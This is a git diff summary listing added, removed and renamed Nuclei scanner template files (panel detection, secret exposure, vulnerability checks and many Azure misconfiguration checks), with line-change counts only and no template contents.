.../Other/aspnetmvc-version-disclosure.yaml | 2 +- .../Other/aspose-file-download-561.yaml | 24 + .../Other/aspose-file-download.yaml | 27 - .../Other/aspose-ie-file-download-562.yaml | 25 - .../Other/aspose-ie-file-download-565.yaml | 29 + ...spose-importer-exporter-file-download.yaml | 2 +- .../Other/aspose-pdf-file-download-568.yaml | 25 + .../Other/aspose-pdf-file-download.yaml | 35 - .../aspose-words-exporter-file-download.yaml | 2 +- .../Other/aspose-words-file-download-571.yaml | 25 + .../Other/aspose-words-file-download-572.yaml | 35 - .../Other/aspx-debug-mode-577.yaml | 33 + .../Other/aspx-debug-mode-578.yaml | 32 - nuclei-templates/Other/astra-sites.yaml | 2 +- nuclei-templates/Other/astra-widgets.yaml | 2 +- .../Other/asus-aicloud-panel.yaml | 5 +- nuclei-templates/Other/asus-router-panel.yaml | 9 +- ...OR-ADM-sqli.yaml => asustor-adm-sqli.yaml} | 0 nuclei-templates/Other/asyncrat-c2.yaml | 5 +- .../atechmedia-codebase-login-check.yaml | 4 +- ...R-fileRead.yaml => athd-dvr-fileread.yaml} | 0 nuclei-templates/Other/atlantis-detect.yaml | 14 +- .../Other/atlassian-api-token.yaml | 5 +- .../Other/atlassian-bamboo-build.yaml | 5 +- .../Other/atlassian-bamboo-panel.yaml | 4 +- .../Other/atlassian-bamboo-setup-wizard.yaml | 5 +- .../Other/atlassian-crowd-panel-581.yaml | 18 + .../Other/atlassian-crowd-panel.yaml | 19 - .../Other/atlassian-login-check.yaml | 5 +- nuclei-templates/Other/atom-sync-remote.yaml | 5 +- .../attitude-theme-open-redirect-586.yaml | 3 +- .../attitude-wp-theme-open-redirect.yaml | 3 - .../Other/audiobookshelf-panel.yaml | 5 +- .../Other/audiocodes-default-login.yaml | 8 +- nuclei-templates/Other/audiocodes-detect.yaml | 10 +- .../Other/aura_utility_services.yaml | 20 + nuclei-templates/Other/auth-js.yaml | 3 - nuclei-templates/Other/auth-json.yaml | 4 +- nuclei-templates/Other/authelia-panel.yaml | 5 +- nuclei-templates/Other/auto-usb-install.yaml | 11 +- .../Other/autobahn-python-detect-593.yaml | 30 - 
.../Other/autobahn-python-detect-594.yaml | 29 + ...ct-596.yaml => automation-direct-597.yaml} | 0 nuclei-templates/Other/automatisch-panel.yaml | 5 +- nuclei-templates/Other/autoptimize.yaml | 2 +- nuclei-templates/Other/autoset-detect.yaml | 4 +- nuclei-templates/Other/avada-xss.yaml | 6 +- .../avatier-password-management-604.yaml | 20 + .../avatier-password-management-605.yaml | 32 - nuclei-templates/Other/avaya-aura-rce.yaml | 30 +- nuclei-templates/Other/avaya-aura-xss.yaml | 15 +- .../Other/avayaaura-cm-panel.yaml | 11 +- .../Other/avayaaura-system-manager-panel.yaml | 11 +- .../Other/avchat-video-chat-xss.yaml | 17 +- .../Other/aviatrix-panel-608.yaml | 31 + nuclei-templates/Other/aviatrix-panel.yaml | 38 - nuclei-templates/Other/avideo-detect.yaml | 6 +- nuclei-templates/Other/avideo-install.yaml | 14 +- ...er-leakge.yaml => avideo-user-leakge.yaml} | 0 nuclei-templates/Other/avigilon-panel.yaml | 12 +- .../Other/avnil-pdf-generator-check.yaml | 5 +- .../Other/avtech-avn801-camera-panel-611.yaml | 29 - .../Other/avtech-avn801-camera-panel.yaml | 32 + ...n-bypass.yaml => avtech-login-bypass.yaml} | 0 ...ess-id-620.yaml => aws-access-id-618.yaml} | 0 .../Other/aws-access-key-value-622.yaml | 18 + .../Other/aws-access-key-value-625.yaml | 18 - .../Other/aws-access-secret-key.yaml | 9 +- .../Other/aws-bucket-takeover-630.yaml | 8 +- .../Other/aws-cloudfront-service-634.yaml | 22 + .../Other/aws-cloudfront-service.yaml | 22 - nuclei-templates/Other/aws-config.yaml | 19 +- nuclei-templates/Other/aws-credentials.yaml | 15 +- nuclei-templates/Other/aws-ec2-autoscale.yaml | 5 +- .../aws-ecs-container-agent-tasks-640.yaml | 48 +- .../aws-elastic-beanstalk-detect-644.yaml | 31 - .../Other/aws-elastic-beanstalk-detect.yaml | 31 + .../Other/aws-opensearch-login-649.yaml | 6 +- nuclei-templates/Other/aws-redirect-652.yaml | 24 + nuclei-templates/Other/aws-redirect-654.yaml | 24 - nuclei-templates/Other/aws-s3-explorer.yaml | 14 +- .../Other/aws-xray-application.yaml | 5 
+- nuclei-templates/Other/awstats-listing.yaml | 7 +- .../Other/awstats-script-658.yaml | 4 +- nuclei-templates/Other/axel-webserver.yaml | 11 +- .../Other/axigen-mail-server-detect.yaml | 12 +- .../Other/axigen-webadmin-660.yaml | 9 +- .../Other/axigen-webmail-662.yaml | 40 + nuclei-templates/Other/axigen-webmail.yaml | 43 - ... axiom-digitalocean-key-exposure-666.yaml} | 0 ...yaxis-669.yaml => axis-happyaxis-670.yaml} | 0 .../Other/axway-api-manager-panel.yaml | 5 +- .../Other/axway-securetransport-panel.yaml | 8 +- .../axway-securetransport-webclient.yaml | 10 +- .../Other/axxon-client-panel.yaml | 9 +- .../Other/azkaban-default-login-671.yaml | 47 + .../Other/azkaban-default-login-673.yaml | 53 - ...lient.yaml => azkaban-web-client-677.yaml} | 0 nuclei-templates/Other/azkaban.yaml | 20 + .../Other/azure-aks-api-unrestricted.yaml | 56 + .../azure-aks-api-version-not-latest.yaml | 56 + .../Other/azure-aks-cni-not-configured.yaml | 56 + .../azure-aks-entra-id-unintegrated.yaml | 55 + ...azure-aks-kubernetes-version-outdated.yaml | 56 + ...azure-aks-managed-identity-unassigned.yaml | 56 + .../azure-aks-network-contrib-unassigned.yaml | 78 + .../Other/azure-aks-not-user-assigned.yaml | 58 + .../Other/azure-aks-rbac-unconfigured.yaml | 56 + .../Other/azure-aks-use-private-kv.yaml | 55 + .../Other/azure-apim-http2-not-enabled.yaml | 56 + .../azure-apim-https-enforcement-missing.yaml | 82 + .../azure-apim-nv-plaintext-exposure.yaml | 73 + .../azure-apim-public-access-disabled.yaml | 56 + ...ure-apim-resource-logs-not-configured.yaml | 56 + .../Other/azure-apim-secretkey.yaml | 5 +- ...system-assigned-identity-unconfigured.yaml | 57 + .../Other/azure-apim-tls-config-weak.yaml | 57 + .../azure-apim-user-assigned-id-not-used.yaml | 57 + .../Other/azure-app-tier-cmk-untagged.yaml | 70 + .../azure-app-tier-vm-disk-unencrypted.yaml | 54 + .../azure-appservice-always-on-disabled.yaml | 53 + .../Other/azure-appservice-auth-disabled.yaml | 54 + 
.../azure-appservice-backup-not-enabled.yaml | 56 + ...e-appservice-backup-retention-missing.yaml | 56 + ...azure-appservice-client-cert-disabled.yaml | 53 + .../azure-appservice-entra-id-missing.yaml | 55 + ...re-appservice-ftp-deployment-disabled.yaml | 53 + ...zure-appservice-ftps-only-not-enabled.yaml | 53 + .../azure-appservice-http2-not-enabled.yaml | 53 + ...re-appservice-https-only-not-enforced.yaml | 54 + ...azure-appservice-insights-not-enabled.yaml | 58 + ...e-appservice-remote-debugging-enabled.yaml | 53 + ...appservice-tls-latest-version-missing.yaml | 55 + .../azure-blob-anonymous-access-disabled.yaml | 54 + .../azure-blob-immutable-not-enabled.yaml | 62 + .../azure-blob-lifecycle-not-enabled.yaml | 57 + .../azure-blob-service-logging-disabled.yaml | 58 + .../azure-blob-soft-delete-disabled.yaml | 55 + .../Other/azure-budget-alerts-missing.yaml | 33 + .../Other/azure-connection-string.yaml | 6 +- .../azure-cosmosdb-auto-failover-missing.yaml | 53 + ...b-default-network-access-unrestricted.yaml | 59 + .../azure-custom-admin-role-unrestricted.yaml | 57 + .../azure-custom-owner-role-unrestricted.yaml | 54 + .../Other/azure-database-tier-cmk-absent.yaml | 70 + .../azure-db-mysql-delete-unalerted.yaml | 59 + ...e-defender-auto-provisioning-disabled.yaml | 33 + .../azure-delete-lb-alert-unconfigured.yaml | 59 + .../Other/azure-diag-logs-not-enabled.yaml | 53 + ...e-diagnostic-categories-misconfigured.yaml | 33 + ...re-disk-encryption-unattached-volumes.yaml | 53 + .../Other/azure-domain-tenant.yaml | 10 +- ...zure-entra-id-guest-users-unmonitored.yaml | 33 + ...azure-functionapp-access-keys-missing.yaml | 55 + .../azure-functionapp-admin-privileges.yaml | 81 + ...azure-functionapp-appinsights-missing.yaml | 62 + .../azure-functionapp-public-exposure.yaml | 55 + ...e-functionapp-system-assigned-missing.yaml | 56 + ...-functionapp-user-assigned-id-missing.yaml | 56 + ...-functionapp-vnet-integration-missing.yaml | 55 + 
...ure-iam-role-resource-lock-unassigned.yaml | 71 + .../azure-key-vault-delete-unalerted.yaml | 59 + .../azure-keyvault-audit-not-enabled.yaml | 53 + ...zure-keyvault-cert-keytype-unapproved.yaml | 70 + ...re-keyvault-cert-transparency-missing.yaml | 70 + ...lt-certificate-insufficient-autorenew.yaml | 76 + .../azure-keyvault-network-unrestricted.yaml | 54 + ...-keyvault-recoverability-unconfigured.yaml | 55 + .../azure-keyvault-resource-lock-check.yaml | 59 + ...zure-keyvault-ssl-autorenewal-missing.yaml | 70 + ...zure-keyvault-trusted-ms-unrestricted.yaml | 53 + .../azure-keyvault-update-unalerted.yaml | 59 + .../Other/azure-lb-create-update-missing.yaml | 59 + nuclei-templates/Other/azure-lb-unused.yaml | 56 + .../azure-log-profile-all-activities.yaml | 56 + ...zure-mfa-not-enabled-privileged-users.yaml | 56 + ...azure-monitor-diagnostic-unrestricted.yaml | 33 + .../azure-mysql-db-update-unalerted.yaml | 59 + .../Other/azure-network-watcher.yaml | 33 + .../Other/azure-nic-ip-forwarding-check.yaml | 55 + .../azure-nsg-create-update-unalerted.yaml | 59 + .../Other/azure-nsg-delete-unalerted.yaml | 59 + .../azure-nsg-rule-delete-unalerted.yaml | 59 + .../azure-nsg-rule-update-unalerted.yaml | 59 + .../Other/azure-openai-cmk-not-enabled.yaml | 58 + ...zure-openai-managed-identity-not-used.yaml | 57 + ...openai-private-endpoints-unconfigured.yaml | 56 + .../azure-openai-public-access-disabled.yaml | 61 + .../Other/azure-pipelines-exposed.yaml | 6 +- ...olicy-assignment-create-alert-missing.yaml | 53 + ...re-policy-assignment-delete-unalerted.yaml | 59 + ...e-policy-not-allowed-types-unassigned.yaml | 57 + ...ostgres-allow-azure-services-disabled.yaml | 58 + ...stgres-connection-throttling-disabled.yaml | 56 + ...e-postgres-double-encryption-disabled.yaml | 56 + ...ure-postgres-log-checkpoints-disabled.yaml | 55 + ...ure-postgres-log-connections-disabled.yaml | 55 + ...-postgres-log-disconnections-disabled.yaml | 55 + .../azure-postgres-log-duration-disabled.yaml | 
55 + .../azure-postgresql-db-delete-unalerted.yaml | 59 + .../azure-postgresql-db-update-unalerted.yaml | 59 + .../azure-postgresql-geo-backup-disabled.yaml | 55 + .../azure-postgresql-ssl-enforcement.yaml | 55 + ...-postgresql-storage-autogrow-disabled.yaml | 56 + .../azure-public-ip-delete-unalerted.yaml | 59 + .../azure-public-ip-update-unalerted.yaml | 59 + .../azure-redis-nonssl-port-disabled.yaml | 54 + .../azure-redis-tls-version-outdated.yaml | 62 + ...rch-service-managed-identity-disabled.yaml | 71 + ...zure-security-policy-update-unalerted.yaml | 59 + ...re-security-solution-delete-unalerted.yaml | 59 + ...e-security-solutions-update-unalerted.yaml | 59 + ...ure-servicebus-public-access-disabled.yaml | 57 + ...azure-servicebus-tls-version-outdated.yaml | 61 + .../Other/azure-sql-auditing-disabled.yaml | 56 + .../azure-sql-database-rename-unalerted.yaml | 59 + .../Other/azure-sql-db-update-unalerted.yaml | 58 + .../Other/azure-sql-delete-db-unalerted.yaml | 59 + .../Other/azure-sql-failover-not-enabled.yaml | 55 + .../Other/azure-sql-fw-rule-unalerted.yaml | 59 + .../azure-sql-mi-tde-cmk-not-enabled.yaml | 54 + .../azure-sql-mi-tls-version-outdated.yaml | 60 + .../Other/azure-sql-tde-cmk-not-used.yaml | 55 + .../Other/azure-sql-tde-not-enabled.yaml | 70 + .../azure-sql-va-emails-unconfigured.yaml | 56 + ...zure-storage-account-delete-unalerted.yaml | 59 + ...zure-storage-account-update-unalerted.yaml | 59 + .../azure-storage-blob-public-access.yaml | 54 + .../Other/azure-storage-byok-not-used.yaml | 54 + .../Other/azure-storage-cmk-not-used.yaml | 54 + ...age-cross-tenant-replication-disabled.yaml | 55 + .../azure-storage-encryption-missing.yaml | 54 + .../Other/azure-storage-min-tls-version.yaml | 60 + .../azure-storage-network-unrestricted.yaml | 55 + .../azure-storage-overly-permissive-sap.yaml | 70 + ...storage-private-endpoint-unconfigured.yaml | 55 + .../Other/azure-storage-public-access.yaml | 70 + .../azure-storage-queue-logging-disabled.yaml | 57 
+ .../Other/azure-storage-secure-transfer.yaml | 55 + .../azure-storage-static-website-review.yaml | 55 + .../azure-storage-table-logging-disabled.yaml | 57 + ...azure-storage-trusted-access-disabled.yaml | 54 + .../azure-synapse-sqlpool-tde-disabled.yaml | 70 + .../Other/azure-takeover-detection-681.yaml | 45 + .../Other/azure-takeover-detection-683.yaml | 40 - ...re-vm-accelerated-networking-disabled.yaml | 70 + ...vm-accelerated-networking-not-enabled.yaml | 54 + ...azure-vm-boot-diagnostics-not-enabled.yaml | 54 + .../Other/azure-vm-boot-disk-unencrypted.yaml | 56 + ...zure-vm-byok-disk-volumes-not-enabled.yaml | 55 + .../azure-vm-create-update-unalerted.yaml | 57 + .../Other/azure-vm-deallocate-unalerted.yaml | 59 + .../Other/azure-vm-delete-unalerted.yaml | 59 + .../azure-vm-endpoint-protection-missing.yaml | 68 + .../Other/azure-vm-entra-id-unenabled.yaml | 57 + .../azure-vm-guest-diagnostics-unenabled.yaml | 55 + .../azure-vm-jit-access-not-enabled.yaml | 55 + .../azure-vm-managed-identity-unassigned.yaml | 55 + ...-vm-performance-diagnostics-unenabled.yaml | 63 + .../Other/azure-vm-poweroff-unalerted.yaml | 59 + .../Other/azure-vm-ssh-auth-type.yaml | 53 + .../Other/azure-vm-standard-ssd-required.yaml | 55 + .../azure-vm-tags-schema-noncompliant.yaml | 60 + .../azure-vm-trusted-launch-disabled.yaml | 55 + .../Other/azure-vm-unapproved-image.yaml | 56 + .../azure-vm-unmanaged-disk-volumes.yaml | 54 + .../azure-vm-web-tier-disk-unencrypted.yaml | 56 + .../azure-vmss-auto-os-upgrade-missing.yaml | 55 + .../azure-vmss-auto-repairs-disabled.yaml | 56 + .../Other/azure-vmss-empty-unattached.yaml | 56 + .../azure-vmss-health-monitoring-missing.yaml | 62 + ...azure-vmss-load-balancer-unassociated.yaml | 56 + .../Other/azure-vmss-public-ip-disabled.yaml | 56 + ...azure-vmss-termination-notif-disabled.yaml | 56 + .../azure-vmss-zone-redundancy-missing.yaml | 62 + .../Other/azure-vnet-ddos-protection.yaml | 55 + nuclei-templates/Other/azure-workflow.yaml | 1 - 
nuclei-templates/Other/azuredeploy-json.yaml | 4 +- .../Other/babel-config-exposure.yaml | 7 +- nuclei-templates/Other/backdoored-zte.yaml | 19 +- nuclei-templates/Other/backoff-malware.yaml | 6 +- .../Other/backpack-admin-panel.yaml | 9 +- nuclei-templates/Other/backwpup.yaml | 4 +- nuclei-templates/Other/badarg-log.yaml | 5 +- nuclei-templates/Other/bagisto-installer.yaml | 6 +- nuclei-templates/Other/bagisto.yaml | 20 + nuclei-templates/Other/bandook-malware.yaml | 4 +- ...anel-684.yaml => barracuda-panel-686.yaml} | 0 .../Other/{bash.yaml => bash-scanner.yaml} | 0 nuclei-templates/Other/basic-auth-detect.yaml | 23 +- ...ion.yaml => basic-auth-detection-687.yaml} | 0 nuclei-templates/Other/basic-cors-flash.yaml | 2 +- nuclei-templates/Other/basic-cors.yaml | 44 +- .../Other/basic-xss-prober-695.yaml | 31 - .../Other/basic-xss-prober-698.yaml | 31 + nuclei-templates/Other/basicrat-malware.yaml | 8 +- nuclei-templates/Other/bazarr-login-703.yaml | 18 + nuclei-templates/Other/bazarr-login.yaml | 18 - nuclei-templates/Other/beamer-api-token.yaml | 5 +- nuclei-templates/Other/beauty.yaml | 59 + .../Other/beego-admin-dashboard.yaml | 11 +- nuclei-templates/Other/behat-config.yaml | 18 +- nuclei-templates/Other/bems-api-lfi-709.yaml | 20 + nuclei-templates/Other/bems-api-lfi-710.yaml | 24 - .../Other/better-search-replace.yaml | 2 +- .../Other/better-wp-security.yaml | 4 +- ...ml => beward-ipcamera-disclosure-715.yaml} | 0 nuclei-templates/Other/bgp-detect.yaml | 4 +- .../Other/bigant-login-panel.yaml | 7 +- ...-724.yaml => bigbluebutton-login-725.yaml} | 0 .../Other/bigcartel-takeover-728.yaml | 10 +- nuclei-templates/Other/bigfix-login.yaml | 13 +- .../bigip-config-utility-detect-730.yaml | 34 - .../bigip-config-utility-detect-733.yaml | 34 + nuclei-templates/Other/bigip-detect.yaml | 24 +- ...etection-735.yaml => bigip-detection.yaml} | 0 nuclei-templates/Other/bigip-rest-panel.yaml | 18 +- nuclei-templates/Other/bin-binlist.yaml | 15 +- 
nuclei-templates/Other/binom-installer.yaml | 6 +- ...ect-736.yaml => biometric-detect-737.yaml} | 0 nuclei-templates/Other/biotime-panel.yaml | 10 +- .../Other/bitbucket-client-id.yaml | 6 +- .../Other/bitbucket-client-secret.yaml | 6 +- .../Other/bitbucket-pipelines.yaml | 5 +- .../Other/bitbucket-public-repository.yaml | 6 +- .../Other/bitbucket-takeover-738.yaml | 25 - .../Other/bitbucket-takeover-741.yaml | 22 + .../Other/bitdefender-gravityzone.yaml | 12 +- nuclei-templates/Other/bitrat-c2.yaml | 5 +- .../bitrix-content-spoofing-imagepg.yaml | 4 +- .../Other/bitrix-open-redirect-745.yaml | 40 + .../Other/bitrix-open-redirect.yaml | 40 - nuclei-templates/Other/bitrix-panel-748.yaml | 27 + nuclei-templates/Other/bitrix-panel-750.yaml | 27 - nuclei-templates/Other/bitrix-xss.yaml | 2 +- .../Other/bittrex-access-key.yaml | 6 +- .../Other/bittrex-secret-key.yaml | 6 +- .../Other/bitwarden-vault-panel.yaml | 8 +- nuclei-templates/Other/black-duck-panel.yaml | 11 +- .../Other/black-studio-tinymce-widget.yaml | 2 +- .../Other/blackbox-exporter-metrics.yaml | 7 +- nuclei-templates/Other/blacknix-malware.yaml | 4 +- nuclei-templates/Other/blackworm-malware.yaml | 6 +- nuclei-templates/Other/blazor-boot.yaml | 4 +- nuclei-templates/Other/blesta-installer.yaml | 5 +- .../Other/blind-oast-polyglots.yaml | 41 - .../Other/bloofoxcms-login-panel.yaml | 10 +- .../Other/blue-ocean-excellence-lfi-756.yaml | 25 - .../Other/blue-ocean-excellence-lfi.yaml | 27 + .../Other/bluebanana-malware.yaml | 4 +- .../Other/bmc-discovery-panel.yaml | 9 +- .../Other/bolt-cms-panel-762.yaml | 37 + .../Other/bolt-cms-panel-763.yaml | 38 - .../Other/bookstack-detect-765.yaml | 30 - nuclei-templates/Other/bookstack-detect.yaml | 30 + .../Other/bootstrap-admin-panel-template.yaml | 7 +- nuclei-templates/Other/bottle-debug.yaml | 7 +- nuclei-templates/Other/bozok-malware.yaml | 6 +- .../Other/braintree-access-token-771.yaml | 17 - .../Other/braintree-access-token.yaml | 17 + 
nuclei-templates/Other/branch-key-774.yaml | 17 + nuclei-templates/Other/branch-key.yaml | 18 - .../Other/brandfolder-lfi-776.yaml | 25 + nuclei-templates/Other/brandfolder-lfi.yaml | 35 - .../Other/brandfolder-open-redirect-780.yaml | 10 +- nuclei-templates/Other/breadcrumb-navxt.yaml | 2 +- .../Other/brightcove-takeover-783.yaml | 19 - .../Other/brightcove-takeover-784.yaml | 15 + .../Other/broken-link-checker.yaml | 2 +- .../Other/brother-printer-detect-788.yaml | 23 - .../Other/brother-printer-detect-789.yaml | 23 + ...l => brother-unauthorized-access-792.yaml} | 0 ...ger.yaml => browserless-debugger-794.yaml} | 0 nuclei-templates/Other/brute-ratel-c4.yaml | 5 +- nuclei-templates/Other/bublik-malware.yaml | 6 +- nuclei-templates/Other/buddy-panel-796.yaml | 38 + nuclei-templates/Other/buddy-panel.yaml | 30 - ...yaml => buffalo-config-injection-798.yaml} | 0 nuclei-templates/Other/build-properties.yaml | 6 +- ...bot-panel-802.yaml => buildbot-panel.yaml} | 0 ...usinessintelligence-default-login-814.yaml | 45 - ...usinessintelligence-default-login-817.yaml | 49 + ...{api-buttercms-403.yaml => buttercms.yaml} | 0 nuclei-templates/Other/bynder-panel.yaml | 4 +- nuclei-templates/Other/caa-fingerprint.yaml | 11 +- .../Other/cab-fare-calculator-lfi-818.yaml | 25 - .../Other/cab-fare-calculator-lfi-819.yaml | 28 + .../Other/cache-poisoning-823.yaml | 33 + .../Other/cache-poisoning-825.yaml | 27 - .../Other/cache-poisoning-xss.yaml | 4 +- nuclei-templates/Other/cached-aem-pages.yaml | 6 +- .../Other/caches-spring-boot.yaml | 2 - nuclei-templates/Other/cacti-panel-828.yaml | 40 + nuclei-templates/Other/cacti-panel-829.yaml | 40 - .../cacti-weathermap-file-write-832.yaml | 23 - .../Other/cacti-weathermap-file-write.yaml | 22 + .../Other/caddy-open-redirect-837.yaml | 16 + .../Other/caddy-open-redirect.yaml | 20 - nuclei-templates/Other/cadvisor-exposure.yaml | 12 +- nuclei-templates/Other/cakephp-config.yaml | 13 +- .../Other/calameo-publications-xss.yaml | 13 +- 
nuclei-templates/Other/caldera-c2.yaml | 6 +- nuclei-templates/Other/calibre.yaml | 23 + .../Other/call-break-cms-840.yaml | 18 + nuclei-templates/Other/call-break-cms.yaml | 18 - nuclei-templates/Other/camera_firmware.yaml | 22 + .../Other/campaignmonitor-843.yaml | 18 + nuclei-templates/Other/campaignmonitor.yaml | 17 - ...anel-845.yaml => camunda-login-panel.yaml} | 0 .../Other/canal-default-login-846.yaml | 35 - .../Other/canal-default-login.yaml | 30 + .../Other/candidate-application-lfi-850.yaml | 13 +- .../Other/canny-takeover-854.yaml | 20 + .../Other/canny-takeover-857.yaml | 21 - .../Other/cap-hookexkeylogger-malware.yaml | 5 +- .../carel-bacnet-gateway-traversal-858.yaml | 6 +- .../Other/carel-plantvisor-panel.yaml | 57 +- .../Other/cargo-lock-package.yaml | 5 +- ...eover-867.yaml => cargo-takeover-869.yaml} | 0 nuclei-templates/Other/cargo-toml-file.yaml | 5 +- .../Other/cargocollective-takeover-864.yaml | 20 + .../Other/cargocollective-takeover-865.yaml | 21 - nuclei-templates/Other/carrental-xss.yaml | 17 +- nuclei-templates/Other/casaos-panel.yaml | 6 +- nuclei-templates/Other/casdoor-login.yaml | 18 +- .../Other/catalog-creator-detect.yaml | 8 +- .../Other/caton-network-manager-system.yaml | 12 +- nuclei-templates/Other/ccm-detect.yaml | 10 +- nuclei-templates/Other/cdg.yaml | 24 + nuclei-templates/Other/cep-viacep.yaml | 13 +- .../Other/{3833918288.yaml => ceph.yaml} | 0 nuclei-templates/Other/cerber-malware.yaml | 8 +- nuclei-templates/Other/cerberus-malware.yaml | 3 +- nuclei-templates/Other/cercopitheque.yaml | 20 + nuclei-templates/Other/cerebro-panel-878.yaml | 26 + nuclei-templates/Other/cerebro-panel-881.yaml | 22 - ...2.yaml => certificate-validation-883.yaml} | 0 nuclei-templates/Other/cgi-printenv-886.yaml | 29 - nuclei-templates/Other/cgi-printenv.yaml | 25 + nuclei-templates/Other/cgi-test-page-888.yaml | 22 - nuclei-templates/Other/cgi-test-page-890.yaml | 23 + .../Other/chamilo-lms-sqli-892.yaml | 5 +- ...-lms-xss.yaml => 
chamilo-lms-xss-893.yaml} | 0 .../Other/changedetection-panel.yaml | 5 +- ...et-CRM-sqli.yaml => chanjet-crm-sqli.yaml} | 0 nuclei-templates/Other/chatgpt_web.yaml | 20 + .../Other/checkmarx-panel-897.yaml | 19 + nuclei-templates/Other/checkmarx-panel.yaml | 18 - .../Other/checkout-fields-manager-xss.yaml | 15 +- ...nel-899.yaml => checkpoint-panel-898.yaml} | 0 .../Other/chefio-login-check.yaml | 5 +- .../Other/cherry-file-download-900.yaml | 29 - .../Other/cherry-file-download.yaml | 25 + nuclei-templates/Other/cherry-lfi-902.yaml | 11 +- .../Other/child-theme-configurator.yaml | 2 +- .../Other/chinaunicom-default-login-908.yaml | 12 +- nuclei-templates/Other/chronos-panel.yaml | 7 +- .../Other/church-admin-lfi-914.yaml | 33 - nuclei-templates/Other/church-admin-lfi.yaml | 28 + nuclei-templates/Other/churchope-lfi-915.yaml | 4 - nuclei-templates/Other/cipher-secret-key.yaml | 6 +- .../Other/ciphertrust-default-login.yaml | 8 +- .../Other/circarlife-setup-917.yaml | 28 - .../Other/circarlife-setup-921.yaml | 30 + .../Other/circleci-config-923.yaml | 26 - .../Other/circleci-config-924.yaml | 25 + .../Other/circleci-ssh-config-927.yaml | 27 - .../Other/circleci-ssh-config-928.yaml | 27 + .../{api-circleci.yaml => circleci.yaml} | 0 .../Other/cisco-anyconnect-vpn.yaml | 11 +- .../Other/cisco-asa-panel-935.yaml | 10 +- .../Other/cisco-cloudcenter-suite-rce.yaml | 26 +- .../Other/cisco-expressway-panel.yaml | 4 +- ...ogin-940.yaml => cisco-finesse-login.yaml} | 0 .../Other/cisco-finger-detect.yaml | 12 +- .../Other/cisco-ios-xe-panel.yaml | 9 +- .../Other/cisco-meraki-exposure-944.yaml | 26 + .../Other/cisco-meraki-exposure-946.yaml | 25 - .../Other/cisco-onprem-panel.yaml | 10 +- .../Other/cisco-rv-series-rce.yaml | 4 - nuclei-templates/Other/cisco-sd-wan-957.yaml | 25 + nuclei-templates/Other/cisco-sd-wan.yaml | 26 - ...s-963.yaml => cisco-security-details.yaml} | 0 .../Other/cisco-sendgrid-968.yaml | 30 + .../Other/cisco-sendgrid-969.yaml | 30 - 
.../Other/cisco-smi-exposure-970.yaml | 35 - .../Other/cisco-smi-exposure-971.yaml | 33 + ...ogin-975.yaml => cisco-systems-login.yaml} | 0 .../cisco-ucs-director-panel-detect.yaml | 2 - .../Other/cisco-ucs-kvm-login-979.yaml | 36 + .../Other/cisco-ucs-kvm-login.yaml | 28 - .../cisco-unified-communications-log4j.yaml | 26 +- .../cisco-unity-express-panel-detect.yaml | 2 - nuclei-templates/Other/cisco-unity-panel.yaml | 6 +- .../Other/cisco-vmanage-log4j.yaml | 38 +- .../Other/cisco-vmanage-login.yaml | 10 +- .../Other/cisco-webvpn-detect.yaml | 10 +- ...aml => citrix-adc-gateway-detect-981.yaml} | 0 .../Other/citrix-hypervisor-page.yaml | 7 +- .../Other/citrix-vpn-detect-984.yaml | 2 +- ...d-xss.yaml => ckan-dom-based-xss-993.yaml} | 0 nuclei-templates/Other/ckan.yaml | 21 + ...uggling.yaml => cl-te-http-smuggling.yaml} | 0 nuclei-templates/Other/clamav-detect.yaml | 60 +- nuclei-templates/Other/clamav-unauth.yaml | 14 +- .../Other/claris-filemaker-webdirect.yaml | 13 +- nuclei-templates/Other/classic-editor.yaml | 2 +- nuclei-templates/Other/classic-widgets.yaml | 2 +- .../Other/clave-login-panel-996.yaml | 4 +- nuclei-templates/Other/cleanweb-panel.yaml | 4 +- nuclei-templates/Other/clearfy-cache-xss.yaml | 14 +- ...aml => clearpass-policy-manager-1001.yaml} | 0 .../Other/click-to-chat-for-whatsapp.yaml | 4 +- .../Other/clickhouse-unauth-1002.yaml | 26 - .../Other/clickhouse-unauth-1003.yaml | 25 + .../clickshare_cs-100_huddle_firmware.yaml | 20 + ...1005.yaml => clientaccesspolicy-1006.yaml} | 0 .../Other/clientmesh-malware.yaml | 5 +- .../Other/clockwatch-enterprise-rce-1009.yaml | 21 +- .../clockwork-dashboard-exposure-1012.yaml | 30 - .../clockwork-dashboard-exposure-1015.yaml | 27 + .../Other/clockwork-php-page-1018.yaml | 22 - .../Other/clockwork-php-page-1019.yaml | 25 + nuclei-templates/Other/clojars-api-token.yaml | 5 +- nuclei-templates/Other/cloud-config.yaml | 6 +- nuclei-templates/Other/cloud-metadata.yaml | 5 +- .../Other/cloud-oa-system-sqli.yaml | 
31 +- .../Other/cloud-run-default-page.yaml | 5 +- nuclei-templates/Other/cloud_foundation.yaml | 20 + .../Other/cloudcenter-Installer.yaml | 5 +- ...3.yaml => cloudflare-image-ssrf-1022.yaml} | 0 .../Other/cloudflare-nginx-detect.yaml | 5 +- .../Other/cloudflare-rocketloader-htmli.yaml | 2 +- nuclei-templates/Other/cloudflare.yaml | 6 +- .../Other/cloudfoundry-detect.yaml | 11 +- nuclei-templates/Other/cloudpanel-login.yaml | 12 +- nuclei-templates/Other/cloudstack.yaml | 22 + nuclei-templates/Other/cmb2.yaml | 2 +- .../Other/cmseasy-crossall-act-sqli.yaml | 27 +- ...yaml => cname-service-detection-1032.yaml} | 0 .../Other/cname-service-detector-1033.yaml | 24 - .../Other/cname-service-detector-1034.yaml | 23 + nuclei-templates/Other/cname-service.yaml | 7 - .../Other/cnnvd-200705-315-1035.yaml | 23 - .../Other/cnnvd-200705-315-1036.yaml | 2 - nuclei-templates/Other/cnpj-receitaws.yaml | 12 +- .../Other/cnvd-2018-13393-1037.yaml | 20 +- ...55-1050.yaml => cnvd-2019-06255-1046.yaml} | 0 .../Other/cnvd-2019-19299-1051.yaml | 54 - .../Other/cnvd-2019-32204-1053.yaml | 3 - .../Other/cnvd-2020-23735-1058.yaml | 27 - .../Other/cnvd-2020-46552-1060.yaml | 29 + ...0-56167.yaml => cnvd-2020-56167-1061.yaml} | 0 .../Other/cnvd-2020-62422-1065.yaml | 14 +- .../Other/cnvd-2020-67113-1071.yaml | 37 + .../Other/cnvd-2020-68596-1075.yaml | 36 + .../Other/cnvd-2021-01931-1077.yaml | 26 - .../Other/cnvd-2021-09650-1080.yaml | 20 +- .../Other/cnvd-2021-10543-1084.yaml | 25 - .../Other/cnvd-2021-14536-1087.yaml | 45 + .../Other/cnvd-2021-15822-1095.yaml | 22 + .../Other/cnvd-2021-15824-1097.yaml | 24 - .../Other/cnvd-2021-17369-1098.yaml | 28 + 